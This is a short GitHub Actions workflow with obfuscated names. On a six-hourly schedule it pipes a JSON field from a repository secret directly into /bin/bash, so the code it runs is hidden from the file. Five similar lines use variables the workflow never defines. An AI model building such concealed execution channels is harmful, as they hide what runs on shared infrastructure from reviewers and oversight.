name: hudropdaimao
on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hudropdaimao
        env:
          ev8237: ${{ secrets.ev8237 }}
        run: |
          echo $ev8237 | jq -r .hrnlv635 | /bin/bash
          echo $snk4918 | jq -r .oowy5 | /bin/bash
          echo $eqjr3 | jq -r .m532 | /bin/bash
          echo $u6947 | jq -r .w3743 | /bin/bash
          echo $h46068 | jq -r .rehi100 | /bin/bash
          echo $qhztd102 | jq -r .npye8 | /bin/bash

